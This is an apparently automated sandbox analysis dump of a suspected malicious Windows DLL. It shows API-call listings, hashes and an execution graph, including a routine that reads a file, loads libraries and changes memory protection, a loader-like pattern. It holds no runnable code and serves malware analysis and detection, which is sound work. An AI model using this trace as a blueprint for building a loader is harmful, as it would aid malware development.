                                                                                                        • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                          • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@TextWindow$Length
                                                                                                        • String ID:
                                                                                                        • API String ID: 2308334395-0
                                                                                                        • Opcode ID: b5bf23dfcb649b2dd38fe4c873e1c0754e372d7d3983432a8b6226a73f45205b
                                                                                                        • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                                                        • Opcode Fuzzy Hash: b5bf23dfcb649b2dd38fe4c873e1c0754e372d7d3983432a8b6226a73f45205b
                                                                                                        • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                                                        APIs
                                                                                                        • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 2001801573-0
                                                                                                        • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                        • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                                                        • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                        • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 00401BA8
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientScreen$ParentRectWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2099118873-0
                                                                                                        • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                        • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                                                        • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                        • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wtol
                                                                                                        • String ID: GUIFlags$[G@
                                                                                                        • API String ID: 2131799477-2126219683
                                                                                                        • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                        • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                                                        • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                        • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                                                        APIs
                                                                                                        • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentVariable
                                                                                                        • String ID: ?O@
                                                                                                        • API String ID: 1431749950-3511380453
                                                                                                        • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                        • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                                                        • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                        • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.6%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0.9%
                                                                                                        Total number of Nodes:678
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 10779 6caf70ac 10781 6caf70a8 10779->10781 10780 6caf7180 GetPEB 10781->10779 10781->10780 11268 6cbcdd30 11269 6cbcdcb6 FPDFAnnot_GetSubtype 11268->11269 11270 6cbcdd56 11269->11270 11272 6cbcddd6 _strlen 11270->11272 11275 6cb2d2dc 11270->11275 11273 6cbcdd6f 11273->11272 11274 6cbcde7a FPDFAnnot_GetSubtype 11273->11274 11274->11272 11278 6cb2d252 11275->11278 11277 6cb2d2ff 11277->11273 11279 6cb2ced8 GetPEB 11278->11279 11281 6cb2d276 11279->11281 11280 6cb2d29f 11280->11277 11281->11280 11282 6cb2d252 GetPEB 11281->11282 11283 6cb2d2ff 11282->11283 11283->11277 11102 6cbd05b0 FPDFAttachment_HasKey 11114 6cbd1db0 11115 6cbd1dcd 11114->11115 11116 6cbd1dd6 FPDFAction_GetType 11115->11116 11117 6cbd1de9 11115->11117 11116->11117 11103 6cbd49b0 11104 6cbd4a0e 11103->11104 11105 6cbd49cd 11103->11105 11105->11104 11106 6caf8810 5 API calls 11105->11106 11106->11104 11107 6cbd27b0 11108 6cbd27cd 11107->11108 11110 6cbd281c 11107->11110 11109 6cbd2860 FPDFPageObj_GetType 11108->11109 11108->11110 11111 6cbd2884 11109->11111 11113 6cbd28ed 11109->11113 11112 6cb2cdf4 GetPEB 11111->11112 11111->11113 11112->11113 11286 6cbd3930 11287 6cbd3950 FPDFImageObj_GetImageFilterCount 11286->11287 11288 6cbd3964 11286->11288 11287->11288 11289 6cbd2330 11290 6cbd236e 11289->11290 11291 6cbd2350 11289->11291 11291->11290 11292 6cbd248a FPDFPageObj_GetType 11291->11292 11292->11290 11297 6cbd249d 11292->11297 11293 6cb2ced8 GetPEB 11293->11297 11294 6cbd2620 FPDFPageObj_GetType 11296 6cbd2648 11294->11296 11295 6cbd25b7 11295->11290 11295->11294 11297->11290 11297->11293 11297->11295 11298 6cbd2730 11299 6cbd2757 11298->11299 11300 6cbd2860 FPDFPageObj_GetType 11299->11300 11301 6cbd2794 11299->11301 11302 6cbd2884 11300->11302 11304 6cbd28ed 11300->11304 11303 6cb2cdf4 GetPEB 11302->11303 11302->11304 11303->11304 10782 6cbcd8a0 10783 6cbcd8c0 10782->10783 10785 6cbcd921 10782->10785 10784 6cbcd914 FPDFAnnot_HasAttachmentPoints 10783->10784 10783->10785 10784->10785 10910 6cbcf420 10911 6cbcf43b 10910->10911 10912 6cbcf4a1 10910->10912 10911->10912 10913 6cbcf44a FPDFPageObj_GetType 10911->10913 10913->10912 10914 6cbcf45b 10913->10914 10918 6cb657ca 10914->10918 10916 6cbcf485 10916->10912 10917 6cbcf493 FPDFPage_GetAnnot 10916->10917 10917->10912 10919 6cb657f2 10918->10919 10920 6cb658c4 10919->10920 10922 6cb2d10a 10919->10922 10920->10916 10925 6cb2d044 10922->10925 10924 6cb2d12e 10924->10919 10926 6cb2ced8 GetPEB 10925->10926 10929 6cb2d06e 10926->10929 10927 6cb2d090 10927->10924 10928 6cb2d044 GetPEB 10930 6cb2d12e 10928->10930 10929->10927 10929->10928 10930->10924 11305 6cbccf20 FPDFAnnot_HasAttachmentPoints 11306 6cbccf4b 11305->11306 11307 6cbcdb20 FPDFAnnot_GetSubtype 11308 6cbcdbee 11307->11308 11309 6cbcdb49 11307->11309 11309->11308 11310 6cbcdcb6 FPDFAnnot_GetSubtype 11309->11310 11311 6cbcdc66 11310->11311 11118 6cbd37a0 11119 6cbd37c0 11118->11119 11121 6cbd3858 11118->11121 11120 6cbd3950 FPDFImageObj_GetImageFilterCount 11119->11120 11119->11121 11120->11121 11124 6cbd2fa0 11125 6cbd2fc0 11124->11125 11126 6cbd30e7 11124->11126 11125->11126 11127 6cbd32ed FPDFPageObj_GetType 11125->11127 11127->11126 11312 6cbd1920 11313 6cbd193a 11312->11313 11317 6cbd1946 11312->11317 11314 6cbc56ef 5 API calls 11313->11314 11313->11317 11315 6cbd19bd 11314->11315 11316 6caf7104 GetPEB 11315->11316 11315->11317 11316->11317 11318 6cbf3720 11319 6cbf373a 11318->11319 11322 6cbf53e0 11319->11322 11323 6cbf540e 11322->11323 11324 6cbf5416 GetCurrentProcess IsWow64Process 11322->11324 11331 6cbf37c0 11323->11331 11326 6cbf5469 11324->11326 11328 6cbf5476 11326->11328 11335 6cbf37f0 11326->11335 11329 6cbf19b0 12 API calls 11328->11329 11330 6cbf554f 11329->11330 11332 6cbf37d8 11331->11332 11333 6cbf19b0 12 API calls 11332->11333 11334 6cbf37e1 11333->11334 11336 6cbf3808 11335->11336 11337 6cbf19b0 12 API calls 11336->11337 11338 6cbf3811 11337->11338 11338->11328 10792 6cbc569c 10793 6cbc56bb 10792->10793 10796 6caf8856 10793->10796 10795 6cbc56c9 10802 6caf88aa 10796->10802 10797 6caf91dc CreateFileW 10804 6caf9262 10797->10804 10798 6caf9ef3 ReadFile 10805 6caf9f8b 10798->10805 10799 6cafac30 LoadLibraryA VirtualProtect 10800 6caf6ce6 10799->10800 10801 6cafad31 VirtualProtect 10800->10801 10803 6caf98a8 10801->10803 10802->10797 10803->10795 10804->10798 10804->10803 10805->10799 10806 6cbcb890 FPDFPageObj_GetType 10807 6cbcb99a 10806->10807 10808 6cbcb8bb 10806->10808 10808->10807 10809 6cbcb9c0 FPDFPageObj_GetType 10808->10809 10810 6cbcb9ee 10809->10810 10811 6cbcbc90 10812 6cbcbcd9 10811->10812 10813 6cbcbcb0 10811->10813 10813->10812 10814 6cbcbcc4 FPDFAnnot_GetSubtype 10813->10814 10814->10812 10817 6cbd1890 10818 6cbd18ab 10817->10818 10820 6cbd18b7 10817->10820 10818->10820 10823 6cbc56ef 10818->10823 10821 6cbd19bd 10821->10820 10827 6caf7104 10821->10827 10824 6cbc5700 10823->10824 10825 6caf8856 5 API calls 10824->10825 10826 6cbc570b 10825->10826 10826->10821 10829 6caf7108 GetPEB 10827->10829 11128 6cbd2990 11129 6cbd29b0 11128->11129 11130 6cb2cdf4 GetPEB 11129->11130 11131 6cbd29f2 11129->11131 11130->11131 11132 6cbf3790 11133 6cbf37a8 11132->11133 11136 6cbf19b0 11133->11136 11137 6cbf19bc 11136->11137 11140 6cbf19a0 11137->11140 11145 6cbf1970 RaiseException 11140->11145 11152 6cd38bb4 11145->11152 11148 6cbf1970 11 API calls 11149 6cbf19ab 11148->11149 11150 6cbf19a0 11 API calls 11149->11150 11151 6cbf19c2 11150->11151 11155 6cd38cf6 11152->11155 11156 6cd38d23 11155->11156 11157 6cd38d35 11155->11157 11176 6cd38be8 GetModuleHandleW 11156->11176 11168 6cd38e75 11157->11168 11162 6cbf199c 11162->11148 11163 6cd38d7f 11183 6cd38cc5 11163->11183 11169 6cd38e81 11168->11169 11189 6cd49ca1 EnterCriticalSection 11169->11189 11171 6cd38e8b 11190 6cd38d8d 11171->11190 11173 6cd38e98 11194 6cd38eb6 11173->11194 11177 6cd38bf4 11176->11177 11177->11157 11178 6cd38c2a GetModuleHandleExW 11177->11178 11179 6cd38c69 GetProcAddress 11178->11179 11182 6cd38c7d 11178->11182 11179->11182 11180 6cd38c90 FreeLibrary 11181 6cd38c99 11180->11181 11181->11157 11182->11180 11182->11181 11184 6cd38ccf 11183->11184 11185 6cd38ce3 11184->11185 11186 6cd38cd3 GetCurrentProcess TerminateProcess 11184->11186 11187 6cd38c2a 3 API calls 11185->11187 11186->11185 11188 6cd38ceb ExitProcess 11187->11188 11189->11171 11191 6cd38d99 11190->11191 11192 6cd38dfd 11191->11192 11197 6cd3ad8f 11191->11197 11192->11173 11217 6cd49cb8 LeaveCriticalSection 11194->11217 11196 6cd38d6c 11196->11162 11196->11163 11198 6cd3ad9b __EH_prolog3 11197->11198 11201 6cd3b01a 11198->11201 11200 6cd3adc2 11200->11192 11202 6cd3b026 11201->11202 11209 6cd49ca1 EnterCriticalSection 11202->11209 11204 6cd3b034 11210 6cd3aee5 11204->11210 11209->11204 11211 6cd3af04 11210->11211 11212 6cd3aefc 11210->11212 11211->11212 11213 6cd486b5 ___free_lconv_mon HeapFree GetLastError 11211->11213 11214 6cd3b069 11212->11214 11213->11212 11215 6cd49cb8 LeaveCriticalSection 11214->11215 11216 6cd3b052 11215->11216 11216->11200 11217->11196 10832 6cbd6e80 10833 6cbd6ea0 10832->10833 10835 6cbd6ece 10832->10835 10834 6cbc56ef 5 API calls 10833->10834 10833->10835 10834->10835 11343 6caf3912 11344 6caf3939 11343->11344 11345 6caf3932 11343->11345 11349 6cd2b517 EnterCriticalSection 11344->11349 11347 6caf3943 11347->11345 11354 6cd2b58d EnterCriticalSection LeaveCriticalSection 11347->11354 11352 6cd2b52b 11349->11352 11351 6cd2b530 LeaveCriticalSection 11351->11347 11352->11351 11359 6cd2b5d7 11352->11359 11355 6cd2b625 11354->11355 11356 6cd2b630 WakeAllConditionVariable 11355->11356 11357 6cd2b641 SetEvent ResetEvent 11355->11357 11356->11345 11357->11345 11360 6cd2b5e5 SleepConditionVariableCS 11359->11360 11361 6cd2b5fe LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 11359->11361 11362 6cd2b622 11360->11362 11361->11362 11362->11352 11364 6cbd1f00 11365 6cbd1f1d 11364->11365 11366 6cbd1f2a FPDFAction_GetType 11365->11366 11375 6cbd1f4d 11365->11375 11367 6cbd1f3d 11366->11367 11366->11375 11368 6cbd20e0 11367->11368 11372 6cbd207a 11367->11372 11367->11375 11369 6cbd218e FPDFPageObj_GetType 11368->11369 11370 6cbd2117 11368->11370 11376 6cbd214a 11368->11376 11377 6cbd21c5 11369->11377 11374 6cb54e3e GetPEB 11370->11374 11373 6cb54d82 GetPEB 11372->11373 11373->11375 11374->11376 11378 6cd4491c 11381 6cd44b9f 11378->11381 11382 6cd44bab 11381->11382 11387 6cd49ca1 EnterCriticalSection 11382->11387 11384 6cd44bb9 11388 6cd44bfb 11384->11388 11387->11384 11391 6cd49cb8 LeaveCriticalSection 11388->11391 11390 6cd44941 11391->11390 11392 6cd4a91e 11393 6cd4a92e 11392->11393 11394 6cd4a935 11392->11394 11401 6cd2fc70 GetLastError 11393->11401 11400 6cd4a943 11394->11400 11405 6cd4a99b 11394->11405 11397 6cd4a96a 11397->11400 11408 6cd4a7a2 IsProcessorFeaturePresent 11397->11408 11399 6cd4a99a 11402 6cd2fc89 11401->11402 11412 6cd48f38 11402->11412 11406 6cd4a9a6 GetLastError SetLastError 11405->11406 11407 6cd4a9bf 11405->11407 11406->11397 11407->11397 11409 6cd4a7ae 11408->11409 11599 6cd4a7d6 11409->11599 11411 6cd4a7c3 GetCurrentProcess TerminateProcess 11411->11399 11413 6cd48f4b 11412->11413 11416 6cd48f51 11412->11416 11425 6cd49584 11413->11425 11415 6cd2fca5 SetLastError 11415->11394 11416->11415 11429 6cd48658 11416->11429 11418 6cd48f7b 11419 6cd48fb7 11418->11419 11420 6cd48f83 11418->11420 11438 6cd4904c 11419->11438 11434 6cd486b5 11420->11434 11424 6cd486b5 ___free_lconv_mon 2 API calls 11424->11415 11426 6cd495a0 11425->11426 11427 6cd495a9 11426->11427 11428 6cd495bb TlsGetValue 11426->11428 11427->11416 11432 6cd48665 11429->11432 11430 6cd48690 HeapAlloc 11431 6cd486a3 11430->11431 11430->11432 11431->11418 11432->11430 11432->11431 11443 6cd38b00 11432->11443 11435 6cd486c0 HeapFree 11434->11435 11437 6cd486e2 ___free_lconv_mon 11434->11437 11436 6cd486d5 GetLastError 11435->11436 11435->11437 11436->11437 11437->11415 11457 6cd491b2 11438->11457 11446 6cd38b3b 11443->11446 11447 6cd38b47 11446->11447 11452 6cd49ca1 EnterCriticalSection 11447->11452 11449 6cd38b52 11453 6cd38b89 11449->11453 11452->11449 11456 6cd49cb8 LeaveCriticalSection 11453->11456 11455 6cd38b0b 11455->11432 11456->11455 11458 6cd491be 11457->11458 11471 6cd49ca1 EnterCriticalSection 11458->11471 11460 6cd491c8 11472 6cd491f8 11460->11472 11463 6cd49204 11464 6cd49210 11463->11464 11476 6cd49ca1 EnterCriticalSection 11464->11476 11466 6cd4921a 11477 6cd49001 11466->11477 11468 6cd49232 11481 6cd49252 11468->11481 11471->11460 11475 6cd49cb8 LeaveCriticalSection 11472->11475 11474 6cd490ba 11474->11463 11475->11474 11476->11466 11478 6cd49010 11477->11478 11480 6cd49037 11477->11480 11478->11480 11484 6cd4cb76 11478->11484 11480->11468 11598 6cd49cb8 LeaveCriticalSection 11481->11598 11483 6cd48fc2 11483->11424 11486 6cd4cbf6 11484->11486 11487 6cd4cb8c 11484->11487 11488 6cd486b5 ___free_lconv_mon 2 API calls 11486->11488 11511 6cd4cc44 11486->11511 11487->11486 11491 6cd4cbbf 11487->11491 11494 6cd486b5 ___free_lconv_mon 2 API calls 11487->11494 11489 6cd4cc18 11488->11489 11492 6cd486b5 ___free_lconv_mon 2 API calls 11489->11492 11490 6cd4cbe1 11493 6cd486b5 ___free_lconv_mon 2 API calls 11490->11493 11491->11490 11499 6cd486b5 ___free_lconv_mon 2 API calls 11491->11499 11495 6cd4cc2b 11492->11495 11496 6cd4cbeb 11493->11496 11498 6cd4cbb4 11494->11498 11500 6cd486b5 ___free_lconv_mon 2 API calls 11495->11500 11501 6cd486b5 ___free_lconv_mon 2 API calls 11496->11501 11497 6cd4ccb2 11502 6cd486b5 ___free_lconv_mon 2 API calls 11497->11502 11512 6cd4bee1 11498->11512 11504 6cd4cbd6 11499->11504 11505 6cd4cc39 11500->11505 11501->11486 11506 6cd4ccb8 11502->11506 11540 6cd4c1fd 11504->11540 11509 6cd486b5 ___free_lconv_mon 2 API calls 11505->11509 11506->11480 11507 6cd4cc52 11507->11497 11510 6cd486b5 HeapFree GetLastError ___free_lconv_mon 11507->11510 11509->11511 11510->11507 11552 6cd4cd10 11511->11552 11513 6cd4bef2 11512->11513 11539 6cd4bfdb 11512->11539 11514 6cd4bf03 11513->11514 11515 6cd486b5 ___free_lconv_mon 2 API calls 11513->11515 11516 6cd4bf15 11514->11516 11517 6cd486b5 ___free_lconv_mon 2 API calls 11514->11517 11515->11514 11518 6cd4bf27 11516->11518 11520 6cd486b5 ___free_lconv_mon 2 API calls 11516->11520 11517->11516 11519 6cd4bf39 11518->11519 11521 6cd486b5 ___free_lconv_mon 2 API calls 11518->11521 11522 6cd4bf4b 11519->11522 11523 6cd486b5 ___free_lconv_mon 2 API calls 11519->11523 11520->11518 11521->11519 11524 6cd4bf5d 11522->11524 11525 6cd486b5 ___free_lconv_mon 2 API calls 11522->11525 11523->11522 11526 6cd486b5 ___free_lconv_mon 2 API calls 11524->11526 11530 6cd4bf6f 11524->11530 11525->11524 11526->11530 11527 6cd486b5 ___free_lconv_mon 2 API calls 11529 6cd4bf81 11527->11529 11528 6cd4bf93 11532 6cd4bfa5 11528->11532 11533 6cd486b5 ___free_lconv_mon 2 API calls 11528->11533 11529->11528 11531 6cd486b5 ___free_lconv_mon 2 API calls 11529->11531 11530->11527 11530->11529 11531->11528 11534 6cd4bfb7 11532->11534 11536 6cd486b5 ___free_lconv_mon 2 API calls 11532->11536 11533->11532 11535 6cd4bfc9 11534->11535 11537 6cd486b5 ___free_lconv_mon 2 API calls 11534->11537 11538 6cd486b5 ___free_lconv_mon 2 API calls 11535->11538 11535->11539 11536->11534 11537->11535 11538->11539 11539->11491 11541 6cd4c262 11540->11541 11542 6cd4c20a 11540->11542 11541->11490 11543 6cd4c21a 11542->11543 11544 6cd486b5 ___free_lconv_mon 2 API calls 11542->11544 11545 6cd4c22c 11543->11545 11546 6cd486b5 ___free_lconv_mon 2 API calls 11543->11546 11544->11543 11547 6cd4c23e 11545->11547 11548 6cd486b5 ___free_lconv_mon 2 API calls 11545->11548 11546->11545 11549 6cd4c250 11547->11549 11550 6cd486b5 ___free_lconv_mon 2 API calls 11547->11550 11548->11547 11549->11541 11551 6cd486b5 ___free_lconv_mon 2 API calls 11549->11551 11550->11549 11551->11541 11553 6cd4cd1d 11552->11553 11554 6cd4cd3c 11552->11554 11553->11554 11558 6cd4c2eb 11553->11558 11554->11507 11557 6cd486b5 ___free_lconv_mon 2 API calls 11557->11554 11559 6cd4c3c9 11558->11559 11560 6cd4c2fc 11558->11560 11559->11557 11594 6cd4c64b 11560->11594 11563 6cd4c64b 2 API calls 11564 6cd4c30f 11563->11564 11565 6cd4c64b 2 API calls 11564->11565 11566 6cd4c31a 11565->11566 11567 6cd4c64b 2 API calls 11566->11567 11568 6cd4c325 11567->11568 11569 6cd4c64b 2 API calls 11568->11569 11570 6cd4c333 11569->11570 11571 6cd486b5 ___free_lconv_mon 2 API calls 11570->11571 11572 6cd4c33e 11571->11572 11573 6cd486b5 ___free_lconv_mon 2 API calls 11572->11573 11574 6cd4c349 11573->11574 11575 6cd486b5 ___free_lconv_mon 2 API calls 11574->11575 11576 6cd4c354 11575->11576 11577 6cd4c64b 2 API calls 11576->11577 11578 6cd4c362 11577->11578 11579 6cd4c64b 2 API calls 11578->11579 11580 6cd4c370 11579->11580 11581 6cd4c64b 2 API calls 11580->11581 11582 6cd4c381 11581->11582 11583 6cd4c64b 2 API calls 11582->11583 11584 6cd4c38f 11583->11584 11585 6cd4c64b 2 API calls 11584->11585 11586 6cd4c39d 11585->11586 11587 6cd486b5 ___free_lconv_mon 2 API calls 11586->11587 11588 6cd4c3a8 11587->11588 11589 6cd486b5 ___free_lconv_mon 2 API calls 11588->11589 11590 6cd4c3b3 11589->11590 11591 6cd486b5 ___free_lconv_mon 2 API calls 11590->11591 11592 6cd4c3be 11591->11592 11593 6cd486b5 ___free_lconv_mon 2 API calls 11592->11593 11593->11559 11595 6cd4c65d 11594->11595 11596 6cd4c304 11595->11596 11597 6cd486b5 ___free_lconv_mon 2 API calls 11595->11597 11596->11563 11597->11595 11598->11483 11600 6cd4a7f2 11599->11600 11601 6cd4a81e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11600->11601 11602 6cd4a8ef 11601->11602 11602->11411 10836 6cbcbef0 FPDFAnnot_GetSubtype 10837 6cbcbf1c 10836->10837 11224 6cbcd7f0 FPDFAnnot_HasAttachmentPoints 11225 6cbcd818 11224->11225 11227 6cbcd863 11224->11227 11226 6cbcd914 FPDFAnnot_HasAttachmentPoints 11225->11226 11225->11227 11226->11227 10838 6cbd20f0 10839 6cbd210b 10838->10839 10842 6cbd214a 10838->10842 10840 6cbd218e FPDFPageObj_GetType 10839->10840 10841 6cbd2117 10839->10841 10845 6cbd21c5 10840->10845 10846 6cb54e3e 10841->10846 10847 6cb54e6e 10846->10847 10849 6cb54e88 10846->10849 10847->10849 10850 6cb2cdf4 10847->10850 10849->10842 10856 6cb2ced8 10850->10856 10852 6cb2ce18 10853 6cb2ce37 10852->10853 10860 6cb2cd5c 10852->10860 10853->10849 10855 6cb2ce8a 10855->10849 10857 6cb2cef3 10856->10857 10858 6cb2cf07 10856->10858 10857->10858 10870 6cb3ce10 10857->10870 10858->10852 10862 6cb2cdc9 10860->10862 10864 6cb2cd77 10860->10864 10861 6cb2cdf4 GetPEB 10861->10864 10862->10855 10863 6cb2cdf0 10865 6cb2ced8 GetPEB 10863->10865 10864->10861 10864->10862 10864->10863 10866 6cb2ce18 10865->10866 10867 6cb2ce37 10866->10867 10868 6cb2cd5c GetPEB 10866->10868 10867->10855 10869 6cb2ce8a 10868->10869 10869->10855 10872 6cb3ce28 10870->10872 10871 6cb3ce37 10871->10858 10872->10871 10873 6caf7104 GetPEB 10872->10873 10874 6cb3ce8e 10873->10874 10874->10858 10875 6cbd4cf0 10876 6cbd4d0f 10875->10876 10878 6cbd4dbc 10875->10878 10876->10878 10879 6caf8810 10876->10879 10886 6caf88aa 10879->10886 10880 6caf91dc CreateFileW 10888 6caf9262 10880->10888 10881 6caf9ef3 ReadFile 10883 6caf9f8b 10881->10883 10882 6cafac30 LoadLibraryA VirtualProtect 10884 6caf6ce6 10882->10884 10883->10882 10885 6cafad31 VirtualProtect 10884->10885 10887 6caf98a8 10885->10887 10886->10880 10887->10878 10888->10881 10888->10887 10955 6cbd3e70 10956 6cbd3e8e 10955->10956 10959 6cb36304 10956->10959 10962 6caf7014 10959->10962 10964 6caf70a8 GetPEB 